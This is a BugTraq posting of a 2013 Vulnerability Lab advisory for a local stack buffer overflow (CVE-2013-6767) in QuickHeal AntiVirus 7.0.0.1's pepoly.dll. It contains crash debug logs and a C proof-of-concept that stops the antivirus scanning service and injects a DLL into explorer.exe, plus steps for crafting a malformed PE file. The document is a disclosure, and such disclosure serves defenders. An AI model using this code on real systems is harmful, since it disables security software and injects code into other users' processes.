BugTraq
QuickHeal AntiVirus 7.0.0.1 - Stack Overflow Vulnerability Dec 16 2013 11:15PM
Vulnerability Lab (research vulnerability-lab com)
Document Title:
===============
QuickHeal AntiVirus 7.0.0.1 - Stack Overflow Vulnerability

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1171

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-6767

CVE-ID:
=====
CVE-2013-6767

Release Date:
=============
2013-12-16

Vulnerability Laboratory ID (VL-ID):
====================================
1171

Common Vulnerability Scoring System:
====================================
5.6

Product & Service Introduction:
===============================
The simple interface and best virus protection technology of Quick Heal AntiVirus Pro ensures complete security without interrupting
or slowing down your system. Real time cloud security restricts access to malware infected websites. Spam filters stop phishing and
infected emails from reaching your inbox. Uninterrupted PC usage and viewing without prompts.

Quick Heal Anti-Virus is an all-round antivirus and security tool aimed at the intermediate home user. On first appearances, Quick Heal
Anti-Virus doesnâ??t do well. Installation is complicated, and the initial window that shows up is not, in fact, the main interface. Once
you find your way back to the control center, however, things become much clearer.

Visually, Quick Heal Anti-Virus is fairly successful. It has a nice, if not revolutionary, interface and all the sections are easy
to navigate. It also has a good selection of configuration options, where you can customize everything from what behavior the program
takes when it finds a virus to setting a password so nobody can change your configurations.

(Copy of the Homepage: http://www.quickheal.com/download-free-antivirus )

Abstract Advisory Information:
==============================
An independent laboratory researcher discovered a local stack buffer overflow vulnerability in the official QuickHeal AntiVirus 7.0.0.1 (b2.0.0.1) Pro software.

Vulnerability Disclosure Timeline:
==================================
2013-12-16: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Quick Heal Technologies (P) Ltd
Product: QuickHeal AntiVirus - Software 7.0.0.1 (build 2.0.0.1 - 2.0.0.0)

Exploitation Technique:
=======================
Local

Severity Level:
===============
Medium

Technical Details & Description:
================================
A local stack buffer overflow vulnerability has been discovered in the official QuickHeal AntiVirus 7.0.0.1 (b2.0.0.1) Pro software.
The vulnerability allows local low privileged user accounts to compromise the system by a classic stack overflow issue.

QuickHeal Antivirus suffers from improper handling of buffers in it`s `pepoly.dll` module on certain conditions which leads
to a stack overflow. Upon disabling `Core scanning server` service, the vulnerable point could be triggered & crash the system.
Just run the PoC & once you see properties dialog, change your tab from `General` to `QuickHeal`. This will cause the QuickHeal
to scan your file & reports back to you the file status (whether it`s infected or clean). It`s notable that, in normal conditions
I was unable to trigger the vulnerability, & this is what`s the reason why I inject a dll into `explorer.exe` to trigger the bug
in right manner.

The vulnerability is located in the generated PE file `*.text` value. Local attackers are able to overflow the process by a
manipulated import of a malicious PE file. The issue is a classic (uni-code) stack buffer overflow. Local attackers can overwrite
the registers to compromise the system or crash the quickheal software system process. The security risk of the local stack buffer
overflow vulnerability is estimated as medium(+) with a cvss (common vulnerability scoring system) count of 5.6(+)|(-)5.7.

The vulnerability can be exploited by local attackers with low privileged system user account and without user interaction.
Successful exploitation of the local stack buffer overflow software vulnerability results in process- and system compromise.

Proof of Concept (PoC):
=======================
The local stack buffer overflow vulnerability can be exploited by local attackers with low privileged system user account and
without user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below.

--- PoC Debug Logs ---
eax=000015bc ebx=03f48a0c ecx=03f12a34 edx=03f47a68 esi=089c84e8 edi=00000000
eip=05bab107 esp=03f47a2c ebp=000822d8 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
*** WARNING: Unable to verify checksum for C:\PROGRA~1\QUICKH~1\QUICKH~1\pepoly.dll
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\PROGRA~1\QUICKH~1\QUICKH~1\pepoly.dll -
pepoly!GetRealTypeByContents+0x297147:
Missing image name, possible paged-out or corrupt data.
Missing image name, possible paged-out or corrupt data.
05bab107 8501 test dword ptr [ecx],eax ds:0023:03f12a34=00000000
0:019> kb
ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
03f47a2c 05b73afa 059342ac 00000000 000822d8 pepoly!GetRealTypeByContents+0x297147
03f47ab0 41414141 41414141 41414141 41414141 pepoly!GetRealTypeByContents+0x25fb3a
03f47ab4 41414141 41414141 41414141 41414141 <Unloaded_Res.dll>+0x41414110
03f47ab8 41414141 41414141 41414141 41414141 <Unloaded_Res.dll>+0x41414110
03f47abc 41414141 41414141 41414141 41414141 <Unloaded_Res.dll>+0x41414110
03f47ac0 41414141 41414141 41414141 41414141 <Unloaded_Res.dll>+0x41414110
03f47ac4 41414141 41414141 41414141 41414141 <Unloaded_Res.dll>+0x41414110
03f47ac8 41414141 41414141 41414141 41414141 <Unloaded_Res.dll>+0x41414110
03f47acc 41414141 41414141 41414141 41414141 <Unloaded_Res.dll>+0x41414110
03f47ad0 41414141 41414141 41414141 30280000 <Unloaded_Res.dll>+0x41414110
03f47ad4 41414141 41414141 30280000 41414141 <Unloaded_Res.dll>+0x41414110
03f47ad8 41414141 30280000 41414141 41414141 <Unloaded_Res.dll>+0x41414110
03f47adc 30280000 41414141 41414141 41414141 <Unloaded_Res.dll>+0x41414110
03f47ae0 41414141 41414141 41414141 41414141 <Unloaded_Res.dll>+0x3027ffcf
03f47ae4 41414141 41414141 41414141 41414141 <Unloaded_Res.dll>+0x41414110
03f47ae8 41414141 41414141 41414141 41414141 <Unloaded_Res.dll>+0x41414110
03f47aec 41414141 41414141 41414141 41414141 <Unloaded_Res.dll>+0x41414110
03f47af0 41414141 41414141 41414141 41414141 <Unloaded_Res.dll>+0x41414110
03f47af4 41414141 41414141 41414141 41414141 <Unloaded_Res.dll>+0x41414110
03f47af8 41414141 41414141 41414141 41414141 <Unloaded_Res.dll>+0x41414110
--- PoC Debug Logs ---

--------------------- *.c

Title : QuickHeal Antivirus Pro (Pepoly.dll) Stack Overflow Vulnerability
Version : 7.0.0.1 (2014) - ( latest & other versions might also be affected )
Author : Arash Allebrahim
Contact : Genius_s3c_firewall($$$)yahoo($$$)com
Vendor : http://www.quickheal.com
Tested : Win 7 sp 1 x86 Ultimate & Win XP SP3 ENG
Note : vuln.exe should be at c:\vuln.exe => vuln.exe is just a Corrupted PE File aims at crashing & nothing more

*/

#include <windows.h>
#include <tlhelp32.h>
#include <shlwapi.h>
#include <conio.h>
#include <stdio.h>
#include <tchar.h>
#include <aclapi.h>

#define WIN32_LEAN_AND_MEAN
#define CREATE_THREAD_ACCESS (PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ)

#pragma comment(lib, "advapi32.lib")

typedef struct _SERVICE_STATUS_PROCESS {
DWORD dwServiceType;
DWORD dwCurrentState;
DWORD dwControlsAccepted;
DWORD dwWin32ExitCode;
DWORD dwServiceSpecificExitCode;
DWORD dwCheckPoint;
DWORD dwWaitHint;
DWORD dwProcessId;
DWORD dwServiceFlags;
} SERVICE_STATUS_PROCESS, *LPSERVICE_STATUS_PROCESS;

VOID __stdcall DoStopSvc();

SC_HANDLE schSCManager;
SC_HANDLE schService;

int main(int argc, char * argv[])
{
char buf[MAX_PATH] = {0};
DWORD pID = GetTargetThreadIDFromProcName("explorer.exe");
printf("\n\n");
printf("\n\nQuickHeal Antivirus (7.0.0.1) pepoly.dll stack overflow vulnerability Proof of Concept Code");
printf("\n\nAuthor : Arash Allebrahim");

GetFullPathName("ShellExecuteExProperties.dll", MAX_PATH, buf, NULL);

printf("\n");

DoStopSvc();
if(!Inject(pID, buf))
{
printf("\n\nDLL Not Loaded!");
}else{
printf("\n\nDLL Loaded!");
printf("\n\n( + ) It's ok! just click on QuickHeal tab!");
}

_getch();
return 0;
}

VOID __stdcall DoStopSvc()
{
SERVICE_STATUS_PROCESS ssp;
DWORD dwStartTime = GetTickCount();
DWORD dwBytesNeeded;
DWORD dwTimeout = 30000;
DWORD dwWaitTime;
schSCManager = OpenSCManager(
NULL,
NULL,
SC_MANAGER_ALL_ACCESS);

if (NULL == schSCManager)
{
printf("OpenSCManager failed (%d)\n", GetLastError());
return;
}

schService = OpenService(
schSCManager,
"Core Scanning Server",
SERVICE_STOP |
SERVICE_QUERY_STATUS |
SERVICE_ENUMERATE_DEPENDENTS);

if (schService == NULL)
{
printf("OpenService failed (%d)\n", GetLastError());
CloseServiceHandle(schSCManager);
return;
}

if ( !ControlService(
schService,
SERVICE_CONTROL_STOP,
(LPSERVICE_STATUS) &ssp ) )
{
printf( "ControlService failed (%d)\n", GetLastError() );
}

CloseServiceHandle(schService);
CloseServiceHandle(schSCManager);
}

BOOL Inject(DWORD pID, const char * DLL_NAME)
{
HANDLE Proc;
HMODULE hLib;
char buf[50] = {0};
LPVOID RemoteString, LoadLibAddy;
if(!pID)
return FALSE;
Proc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pID);
if(!Proc)
{
sprintf(buf, "OpenProcess() failed: %d", GetLastError());
printf(buf);
return FALSE;
}
LoadLibAddy = (LPVOID)GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA");
RemoteString = (LPVOID)VirtualAllocEx(Proc, NULL, strlen(DLL_NAME), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
WriteProcessMemory(Proc, (LPVOID)RemoteString, DLL_NAME, strlen(DLL_NAME), NULL);
CreateRemoteThread(Proc, NULL, NULL, (LPTHREAD_START_ROUTINE)LoadLibAddy, (LPVOID)RemoteString, NULL, NULL);
CloseHandle(Proc);
return TRUE;
}

DWORD GetTargetThreadIDFromProcName(const char * ProcName)
{
PROCESSENTRY32 pe;
HANDLE thSnapShot;
BOOL retval, ProcFound = FALSE;
thSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if(thSnapShot == INVALID_HANDLE_VALUE)
{
printf("Error: Unable to create toolhelp snapshot!");
return FALSE;
}
pe.dwSize = sizeof(PROCESSENTRY32);

retval = Process32First(thSnapShot, &pe);
while(retval)
{
if(StrStrI(pe.szExeFile, ProcName))
{
return pe.th32ProcessID;
}
retval = Process32Next(thSnapShot, &pe);
}
return 0;
}

PoC: PE File

To manipulate a PE test file you need to generate own.
In the second step you replace after the PE[NULL] flag the context of the *.text (*) value with an own large uni-code string.

Standard files: StdAfx.h, StdAfx.cpp
These files are used to build a precompiled header (PCH) file
named ShellExecuteExProperties.pch and a precompiled types file named StdAfx.obj.

Other notes:
AppWizard uses "TODO:" to indicate parts of the source code you
should add to or customize.

Resource(s):
../ShellExecuteExProperties/ShellExecuteExProperties.cpp
../ShellExecuteExProperties/ShellExecuteExProperties.dsw
../ShellExecuteExProperties/ShellExecuteExProperties.opt
../ShellExecuteExProperties/ShellExecuteExProperties.ncb
../ShellExecuteExProperties/ShellExecuteExProperties.plg
../ShellExecuteExProperties/ShellExecuteExProperties.dsp
../ShellExecuteExProperties/StdAfx.cpp
../ShellExecuteExProperties/StdAfx.h
../ShellExecuteExProperties/Debug/ShellExecuteExProperties.dll
../ShellExecuteExProperties/Debug/ShellExecuteExProperties.ilk
../ShellExecuteExProperties/Debug/ShellExecuteExProperties.obj
../ShellExecuteExProperties/Debug/ShellExecuteExProperties.pch
../ShellExecuteExProperties/Debug/ShellExecuteExProperties.pdb
../ShellExecuteExProperties/Debug/StdAfx.obj
../ShellExecuteExProperties/Debug/vc60.idb
../ShellExecuteExProperties/Debug/vc60.pdb

../QH-PoC.c
../QH-PoC.dsp
../QH-PoC.dsw
../QH-PoC.ncb
../QH-PoC.opt
../QH-PoC.plg

Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure filter and size restriction of the PE file name text flag.

Security Risk:
==============
The security risk of the local stack buffer overflow vulnerability is estimated as medium(+).

Credits & Authors:
==================
Arash Allebrahim - (Genius_s3c_firewall($$$)yahoo($$$)com)

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin (at) vulnerability-lab (dot) com [email concealed] - research (at) vulnerability-lab (dot) com [email concealed] - admin (at) evolution-sec (dot) com [email concealed]
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin (at) vulnerability-lab (dot) com [email concealed] or research (at) vulnerability-lab (dot) com [email concealed]) to get a permission.

Copyright © 2013 | Vulnerability Laboratory [Evolution Security]

--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research (at) vulnerability-lab (dot) com [email concealed]

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus